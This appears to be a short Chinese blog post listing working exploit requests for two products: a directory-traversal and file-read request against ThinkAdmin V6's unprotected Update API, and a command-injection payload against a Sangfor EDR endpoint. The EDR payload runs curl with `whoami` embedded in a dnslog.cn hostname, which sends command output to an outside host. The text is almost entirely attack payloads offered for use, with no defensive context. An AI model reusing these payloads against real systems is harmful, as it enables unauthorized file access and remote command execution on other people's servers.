一、ThinkAdminV6 任意文件操作
Update.php 三个函数未校验访问权限
目录遍历注意POST数据包rules参数值需要URL编码
POST /admin.html?s=admin/api.Update/node rules=%5B%22.%2F%22%5D
文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。
/admin.html?s=admin/api.Update/get/encode/ 34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
二、深信服EDR 远程命令执行
遇到这样的漏洞反手就是一个赞。
/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
{"params": "w=123\"'1234123'\"|curl `whoami`.dnslog.cn"}
文章评论